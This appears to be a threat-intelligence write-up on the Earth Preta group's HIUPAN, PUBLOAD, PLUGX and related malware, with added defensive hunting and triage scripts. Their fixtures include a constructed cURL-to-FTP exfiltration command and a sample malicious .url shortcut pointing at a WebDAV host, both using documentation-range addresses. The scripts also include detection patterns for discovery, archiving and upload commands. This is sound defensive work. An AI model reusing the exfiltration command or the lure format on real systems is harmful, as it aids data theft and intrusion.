Earth Preta has expanded its toolset: the HIUPAN worm now delivers PUBLOAD, and two new tools, FDMTP and PTSOCKET, give the group additional control and data-exfiltration channels.
Its spear-phishing campaigns use multi-stage downloaders such as DOWNBAIT and PULLBAIT to deliver further malware. The group's highly targeted attacks in the APAC region are aimed at specific countries and sectors and typically move quickly from initial deployment to data exfiltration.
In the removable-drive campaign, the HIUPAN worm introduced the PUBLOAD backdoor into target networks; PUBLOAD then executed various tools for data collection and exfiltration, and FDMTP and PTSOCKET were brought in to provide alternative control and exfiltration options.
The updated HIUPAN variant, which now spreads PUBLOAD via removable drives, is easier to configure than earlier versions because it reads an external configuration file that sets its propagation and watchdog parameters: a decimal value in the config determines how long the watchdog sleeps between checks, and a list of filenames specifies which files HIUPAN copies to removable drives.
HIUPAN installs itself and its associated files into a fixed directory, creates an autorun registry entry, and changes registry settings so that its files stay hidden; it re-checks those settings periodically and restores them if they change, so the malware remains hidden.
It also polls for removable drives and propagates to any it finds, creating a hidden storage directory on the drive and placing copies of its files there. At the same time it acts as a watchdog for PUBLOAD, launching the process if it is not already running.
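The three host-side behaviours above (autorun entry, Explorer hiding settings, executables copied into a subdirectory of a removable drive) can be hunted for in endpoint telemetry. The script below is an added example, not Trend Micro's or the actor's code; it uses a constructed, simplified Sysmon-style event schema, assumes the collector adds a "DriveType" enrichment to file events, and assumes the hiding is done with the real Explorer values Hidden=2 and ShowSuperHidden=0, which the page does not confirm for HIUPAN.

```python
"""Hunt for HIUPAN-style artefacts in Sysmon-like registry and file events.

Added example; not Trend Micro's or the actor's code. It models the three host
behaviours described above: an autorun registry entry, Explorer settings
changed so the dropped files stay invisible, and executables copied into a
subdirectory of a removable drive. Assumptions: the event dicts use a
simplified, constructed Sysmon-style schema; "DriveType" is an enrichment the
collector is assumed to add; Hidden=2 and ShowSuperHidden=0 are real Explorer
values that hide hidden and OS-protected files, but the page does not name the
exact registry values HIUPAN edits.
"""
import re
from collections import defaultdict

RUN_KEYS = (
    "\\software\\microsoft\\windows\\currentversion\\run\\",
    "\\software\\microsoft\\windows\\currentversion\\runonce\\",
)
EXPLORER_ADV = "\\software\\microsoft\\windows\\currentversion\\explorer\\advanced\\"
HIDING_VALUES = {"hidden": 2, "showsuperhidden": 0}   # assumed hiding settings
DWORD_RE = re.compile(r"dword \(0x([0-9a-f]{8})\)")
EXEC_EXT = (".exe", ".dll", ".lnk")


def _dword(details):
    """Parse a Sysmon 'DWORD (0x........)' Details string; None if not a DWORD."""
    m = DWORD_RE.fullmatch(details.strip().lower())
    return int(m.group(1), 16) if m else None


def registry_findings(ev):
    """Tags for one RegistryValueSet event: 'autorun_added' and/or 'explorer_hiding'."""
    target = ev["TargetObject"].lower()
    tags = []
    if any(k in target for k in RUN_KEYS):
        tags.append("autorun_added")
    if EXPLORER_ADV in target:
        name = target.rsplit("\\", 1)[-1]
        if name in HIDING_VALUES and _dword(ev["Details"]) == HIDING_VALUES[name]:
            tags.append("explorer_hiding")
    return tags


def file_findings(ev):
    """Tag 'removable_drop' when an executable lands in a subdirectory of a removable drive."""
    path = ev["TargetFilename"].lower()
    on_removable = ev.get("DriveType", "").lower() == "removable"
    in_subdir = path.count("\\") >= 2          # e:\dir\file.exe, not e:\file.exe
    return ["removable_drop"] if on_removable and in_subdir and path.endswith(EXEC_EXT) else []


def hunt(events):
    """Per host: (sorted tags, True if all three HIUPAN behaviours were seen)."""
    per_host = defaultdict(set)
    for ev in events:
        if ev["EventType"] == "RegistryValueSet":
            per_host[ev["Computer"]].update(registry_findings(ev))
        elif ev["EventType"] == "FileCreate":
            per_host[ev["Computer"]].update(file_findings(ev))
    full = {"autorun_added", "explorer_hiding", "removable_drop"}
    return {h: (sorted(t), full <= t) for h, t in per_host.items()}


# Constructed sample events; names and paths are illustrative, not indicators.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "EventType": "RegistryValueSet",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\usbwatch",
     "Details": r"C:\ProgramData\usbwatch\usbwatch.exe"},
    {"Computer": "WS01", "EventType": "RegistryValueSet",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000002)"},
    {"Computer": "WS01", "EventType": "RegistryValueSet",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",
     "Details": "DWORD (0x00000000)"},
    {"Computer": "WS01", "EventType": "FileCreate", "DriveType": "removable",
     "TargetFilename": r"E:\data\usbwatch.exe"},
    # Benign host: user enables hidden-file display and saves a document to a USB stick.
    {"Computer": "WS02", "EventType": "RegistryValueSet",
     "TargetObject": r"HKU\S-1-5-21-2\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
    {"Computer": "WS02", "EventType": "FileCreate", "DriveType": "removable",
     "TargetFilename": r"E:\report.docx"},
]

if __name__ == "__main__":
    for host, (tags, full_match) in hunt(SAMPLE_EVENTS).items():
        print(host, tags, "<- full HIUPAN pattern" if full_match else "")
```

Each tag on its own is noisy (users do toggle Explorer's hidden-file settings, and people do copy executables to USB sticks); the value is in requiring all three on one host, which is why hunt() reports the combination rather than the individual tags.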
PUBLOAD, like the previously documented variants, gathers system information to map the network and persists through autorun entries and scheduled tasks. It runs built-in network commands and WMIC to enumerate network devices, running processes, and locally installed security software.
FDMTP, a new malware downloader, is embedded in a DLL and launched via DLL side-loading. To evade detection, its network configuration is Base64-encoded and DES-encrypted.
For collection, PUBLOAD uses RAR to archive the target files and then exfiltrates the archives either with cURL, which uploads them to an attacker-controlled FTP server, or with PTSOCKET, a customized file transfer tool.
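The discovery, archiving and upload steps described in the two paragraphs above are all performed with ordinary command-line tools, so the most reliable signal is their sequence on one host rather than any single command. The script below is an added example, not code from the report or the actor: it classifies constructed process command lines into discovery (net, ipconfig, WMIC), staging (RAR) and exfiltration (cURL upload to FTP) and alerts when all three occur in that order within a window. The regexes assume typical invocations of those tools, since the page gives no exact switches, and 203.0.113.0/24 is a documentation range, not a real server.

```python
"""Correlate PUBLOAD-style discovery, RAR staging and cURL-to-FTP exfiltration.

Added example; not code from the report or the actor. It classifies process
command lines into the three phases the text describes (network, process and
security-software discovery with net, ipconfig and WMIC; archiving with RAR;
upload with cURL to an FTP server) and alerts on a host that shows all three
in that order within a time window. The command lines are constructed samples
and the regexes assume typical invocations of those tools; the page gives no
exact switches. 203.0.113.0/24 is a documentation range, not a real C2.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

PHASES = {
    "discovery": [
        re.compile(r"^\s*net1?(?:\.exe)?\s+(?:view|user|group|localgroup|share|start)\b", re.I),
        re.compile(r"^\s*ipconfig(?:\.exe)?\s+/all\b", re.I),
        re.compile(r"^\s*wmic(?:\.exe)?\b.*?(?:\b(?:process|product|nicconfig|antivirusproduct|securitycenter2)\b|/node:)", re.I),
        re.compile(r"^\s*tasklist(?:\.exe)?\b", re.I),
    ],
    "staging": [
        re.compile(r"^\s*(?:\S*[\\/])?rar(?:\.exe)?\s+a\b", re.I),
    ],
    "exfil": [
        re.compile(r"^\s*(?:\S*[\\/])?curl(?:\.exe)?\b.*\s(?:-T|--upload-file)\s+\S+.*\bftps?://", re.I),
    ],
}
WINDOW = timedelta(hours=2)


def classify(cmdline):
    """Return 'discovery', 'staging', 'exfil' or None for one command line."""
    for phase, patterns in PHASES.items():
        if any(p.search(cmdline) for p in patterns):
            return phase
    return None


def detect_chain(events, window=WINDOW):
    """Per host: (sorted phases seen, True if discovery -> staging -> exfil occurred within window)."""
    per_host = defaultdict(list)
    for ev in events:
        phase = classify(ev["CommandLine"])
        if phase:
            per_host[ev["Computer"]].append((datetime.fromisoformat(ev["UtcTime"]), phase))
    alerts = {}
    for host, seq in per_host.items():
        seq.sort()
        hit = False
        for i, (t_exfil, phase) in enumerate(seq):
            if phase != "exfil":
                continue
            earlier = [(t, p) for t, p in seq[:i] if t_exfil - t <= window]
            t_stage = max((t for t, p in earlier if p == "staging"), default=None)
            if t_stage is None:
                continue
            if any(p == "discovery" and t <= t_stage for t, p in earlier):
                hit = True
                break
        alerts[host] = (sorted({p for _, p in seq}), hit)
    return alerts


# Constructed sample process-creation events.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "UtcTime": "2024-09-05T10:00:00", "CommandLine": "net view /all"},
    {"Computer": "WS01", "UtcTime": "2024-09-05T10:02:00", "CommandLine": "ipconfig /all"},
    {"Computer": "WS01", "UtcTime": "2024-09-05T10:05:00",
     "CommandLine": r"wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname"},
    {"Computer": "WS01", "UtcTime": "2024-09-05T10:30:00",
     "CommandLine": r"rar.exe a -r -ep1 C:\Users\Public\docs.rar C:\Users\alice\Documents"},
    {"Computer": "WS01", "UtcTime": "2024-09-05T10:40:00",
     "CommandLine": r"curl.exe -T C:\Users\Public\docs.rar ftp://203.0.113.5/up/ -u user:pass"},
    # Benign host: a backup archive, an unrelated share listing days later, a download (not an upload).
    {"Computer": "WS02", "UtcTime": "2024-09-01T09:00:00", "CommandLine": r"rar a backup.rar D:\projects"},
    {"Computer": "WS02", "UtcTime": "2024-09-04T09:00:00", "CommandLine": "net view"},
    {"Computer": "WS02", "UtcTime": "2024-09-04T09:05:00", "CommandLine": "curl -o out.bin https://example.com/x"},
]

if __name__ == "__main__":
    for host, (phases, hit) in detect_chain(SAMPLE_EVENTS).items():
        print(host, phases, "<- discovery/staging/exfil chain" if hit else "")
```

The exfil pattern deliberately keys on an upload (-T or --upload-file to an ftp:// target) rather than on cURL itself, because cURL downloads are routine on administrator workstations; PTSOCKET traffic would need a network-level rule instead, since it is a custom tool with no command-line signature given on the page.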
The spear-phishing campaign uses a .url attachment to deliver the DOWNBAIT downloader. DOWNBAIT decrypts and executes both a decoy document and the PULLBAIT shellcode, and PULLBAIT in turn downloads and executes CBROVER, the first-stage backdoor, from an attacker-controlled WebDAV server.
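Because the chain starts with a .url attachment, mail-gateway triage can inspect that file directly: it is an INI-style text file whose [InternetShortcut] section carries URL= and optionally IconFile= and WorkingDirectory=, and any of those fields can point off-host. The parser below is an added example, not code from the report; it flags UNC paths, the WebDAV redirector form (\\host@80\DavWWWRoot\...), file:// URLs and links to executable content, while treating a plain http(s) link (what a .url file is for) as benign. The sample files are constructed and 203.0.113.0/24 is a documentation range, not an indicator from the report.

```python
"""Triage an Internet Shortcut (.url) attachment for off-host targets.

Added example; not code from the report. A .url file is an INI-style text file
whose [InternetShortcut] section holds URL= and optionally IconFile= and
WorkingDirectory=. Because the chain above starts with such an attachment, the
script parses those fields and flags values that reach off the host: UNC paths
(\\host\share), the WebDAV redirector form (\\host@80\DavWWWRoot\...), file://
URLs and http(s)/ftp links ending in executable extensions. A plain http(s)
link is what a .url is for and is reported but not flagged. Sample files are
constructed; 203.0.113.0/24 is a documentation range, not a real indicator.
"""
import configparser
import re
from urllib.parse import urlparse

REMOTE_KEYS = ("url", "iconfile", "workingdirectory")
UNC_RE = re.compile(r"^\\\\[^\\@]+(?:@(?:ssl@)?\d+)?\\", re.I)
WEBDAV_RE = re.compile(r"^\\\\[^\\]+@(?:ssl@)?\d+\\", re.I)
EXEC_EXT = (".exe", ".dll", ".lnk", ".scr", ".cpl", ".js", ".vbs", ".bat", ".cmd", ".hta", ".msi")


def parse_url_file(text):
    """Return the [InternetShortcut] entries with lower-cased keys; ValueError if absent."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        raise ValueError("no [InternetShortcut] section")
    return dict(cp.items("InternetShortcut"))


def classify_target(value):
    """'webdav', 'unc', 'file-url', 'remote-exec', 'remote' or 'local' for one field value."""
    v = value.strip().strip('"')
    if WEBDAV_RE.match(v) or "davwwwroot" in v.lower():
        return "webdav"
    if UNC_RE.match(v):
        return "unc"
    scheme = urlparse(v).scheme.lower()
    if scheme == "file":
        return "file-url"
    if scheme in ("http", "https", "ftp"):
        return "remote-exec" if urlparse(v).path.lower().endswith(EXEC_EXT) else "remote"
    return "local"


def triage(text):
    """Return ('suspicious' | 'benign', {field: classification}) for the off-host fields."""
    findings = {}
    for key, value in parse_url_file(text).items():
        if key in REMOTE_KEYS:
            cls = classify_target(value)
            if cls != "local":
                findings[key] = cls
    suspicious = any(c != "remote" for c in findings.values())
    return ("suspicious" if suspicious else "benign"), findings


# Constructed samples.
SAMPLE_MALICIOUS = r"""[InternetShortcut]
URL=file://203.0.113.9@80/DavWWWRoot/share/Invitation.pdf.lnk
IconFile=\\203.0.113.9@80\DavWWWRoot\share\pdf.ico
IconIndex=0
"""
SAMPLE_BENIGN = """[InternetShortcut]
URL=https://www.example.com/
"""

if __name__ == "__main__":
    for name, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, triage(sample))
```

IconFile is checked as well as URL because Explorer resolves the icon path when it merely renders the attachment, so a remote IconFile can trigger an outbound WebDAV connection before the user clicks anything.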
According to Trend Micro, the attackers first deployed CBROVER and used it to deploy the first-stage PLUGX components, which in turn loaded the second-stage PLUGX components; the second-stage components were encrypted with RC4 and protected with DPAPI.
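The RC4-plus-DPAPI protection has a practical consequence for analysts: a DPAPI blob is bound to the victim's user or machine master key, so it cannot be decrypted on an analysis box from the file alone. The helper below is an added example, not code from the report; it assumes DPAPI is the outer layer and RC4 the inner one (the page does not state the order), calls CryptUnprotectData through ctypes when run on the victim's Windows host, and otherwise shows only the RC4 layer, which needs just the key recovered from the loader. The RC4 routine is the standard algorithm checked against a published test vector, and the sample key and blob are constructed.

```python
"""Unwrap a PLUGX-style component protected with DPAPI and RC4.

Added example; not code from the report. The text says the second-stage PLUGX
components were encrypted with RC4 and DPAPI. The order of the layers is not
stated on the page, so this helper assumes DPAPI outside and RC4 inside: the
DPAPI layer binds the blob to the victim's user or machine master key, so it
can only be removed on that host (CryptUnprotectData via ctypes below) or with
exported master keys, after which the inner RC4 layer needs only the key
recovered from the loader. The RC4 routine is the standard KSA/PRGA checked
against a published test vector; the sample blob and key are constructed.
"""
import ctypes
import sys


def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4; the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation + XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def dpapi_unprotect(blob: bytes) -> bytes:
    """CryptUnprotectData wrapper; succeeds only on the Windows host/user that protected the blob."""
    if sys.platform != "win32":
        raise OSError("DPAPI blobs can only be unwrapped on Windows with the original master key")

    class DataBlob(ctypes.Structure):
        _fields_ = [("cbData", ctypes.c_uint32), ("pbData", ctypes.POINTER(ctypes.c_char))]

    buf = ctypes.create_string_buffer(blob, len(blob))
    src = DataBlob(len(blob), ctypes.cast(buf, ctypes.POINTER(ctypes.c_char)))
    dst = DataBlob()
    crypt32 = ctypes.windll.crypt32
    if not crypt32.CryptUnprotectData(ctypes.byref(src), None, None, None, None, 0, ctypes.byref(dst)):
        raise ctypes.WinError()
    try:
        return ctypes.string_at(dst.pbData, dst.cbData)
    finally:
        ctypes.windll.kernel32.LocalFree(dst.pbData)


def unwrap_stage(blob: bytes, rc4_key: bytes, dpapi_protected: bool = True) -> bytes:
    """Strip the assumed outer DPAPI layer (on the victim host), then the inner RC4 layer."""
    inner = dpapi_unprotect(blob) if dpapi_protected else blob
    return rc4(rc4_key, inner)


# Published RC4 test vector (key "Key", plaintext "Plaintext").
RC4_VECTOR_CT = bytes.fromhex("bbf316e8d940af0ad3")

# Constructed stand-in for a stage whose DPAPI layer was already removed on the host.
SAMPLE_RC4_KEY = b"example-loader-key"                     # hypothetical key
SAMPLE_STAGE = rc4(SAMPLE_RC4_KEY, b"MZ\x90\x00constructed second-stage stand-in")

if __name__ == "__main__":
    print(rc4(b"Key", b"Plaintext") == RC4_VECTOR_CT)     # True
    print(unwrap_stage(SAMPLE_STAGE, SAMPLE_RC4_KEY, dpapi_protected=False)[:2])   # b'MZ'
```

In practice this means the second-stage components have to be recovered on the compromised machine (or from a disk image together with the user's DPAPI master keys and credentials) rather than from a copied file, which is the point of layering DPAPI over a conventional cipher.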
The first-stage PLUGX components were also used to deploy FILESAC, a file collector that gathers documents from the victim's machine. The attackers thus had two ways of collecting sensitive documents from targeted victims: RAR archiving and FILESAC.
The collected documents were then exfiltrated to a cloud storage service with a tool that authenticates through Microsoft's identity platform. That tool was hosted on the same WebDAV server that held the decoy documents and other malware.